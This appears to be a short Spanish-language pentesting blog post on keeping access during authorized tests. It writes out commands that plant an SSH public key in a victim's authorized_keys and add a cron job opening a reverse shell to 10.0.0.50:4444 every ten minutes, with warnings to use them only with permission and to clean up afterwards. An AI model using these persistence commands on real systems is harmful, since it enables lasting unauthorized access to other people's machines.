~ / blog / pentesting
KALI

Mantén el acceso (con permiso)

En un pentest autorizado, a veces necesitas asegurar que no perderás el acceso.

Las formas más limpias: añades tu llave pública al archivo de llaves autorizadas del usuario, y entras sin contraseña cuando quieras. O dejas una tarea cron que te devuelve una shell periódicamente.

Documenta cada mecanismo de persistencia que dejes, para retirarlo al terminar. Lo que un atacante hace para quedarse, tú lo replicas para demostrar el impacto, y luego lo limpias.

Solo en trabajos autorizados.

# los comandos

www-data@victim:$ mkdir -p ~/.ssh && echo 'ssh-ed25519 AAAA...pentest' >> ~/.ssh/authorized_keyscopiar
kali@kali:~$ ssh -i pentest_key usuario@10.0.0.5copiar
(acceso sin contraseña)
www-data@victim:$ (crontab -l; echo '*/10 * * * * bash -i >& /dev/tcp/10.0.0.50/4444 0>&1') | crontab -copiar
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.